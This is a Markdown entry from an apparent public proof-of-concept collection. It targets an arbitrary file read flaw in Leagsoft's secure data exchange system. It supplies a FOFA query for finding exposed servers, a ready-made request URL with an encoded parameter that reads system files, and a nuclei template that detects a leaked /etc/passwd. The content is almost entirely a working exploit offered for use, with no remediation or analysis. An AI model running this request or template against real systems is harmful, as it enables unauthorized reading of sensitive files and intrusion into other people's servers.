mirror of
https://github.com/eeeeeeeeee-code/POC.git
synced 2025-07-29 14:04:06 +00:00
42 lines
834 B
Markdown
42 lines
834 B
Markdown
## 联软安全数据交换系统任意文件读取
|
|
|
|
## fofa
|
|
```
|
|
body="UniExServices"
|
|
```
|
|
|
|
## poc
|
|
```
|
|
/UniExServices/poserver.zz?pgop=opendiskdoc&id=KmcgY3MtK3IpLSRfOXE9YmpkL2orbBdrKztnJCltInIrbDhyP24rOzhjPHI=
|
|
```
|
|
|
|
## nuclei
|
|
```
|
|
id: leagsoft-safedata-exchange-file-fileread
|
|
|
|
info:
|
|
name: 联软安全数据交换系统任意文件读取
|
|
author: mmy
|
|
severity: high
|
|
tags: leagsoft,fileread
|
|
description: 联软安全数据交换系统任意文件读取
|
|
reference:
|
|
-
|
|
metadata:
|
|
fofa-query: 'body="UniExServices"'
|
|
verified: true
|
|
max-request: 1
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{RootURL}}/UniExServices/poserver.zz?pgop=opendiskdoc&id=KmcgY3MtK3IpLSRfOXE9YmpkL2orbBdrKztnJCltInIrbDhyP24rOzhjPHI="
|
|
|
|
matchers:
|
|
- type: regex
|
|
part: body
|
|
regex:
|
|
- "root:[x*]:0:0:"
|
|
|
|
```
|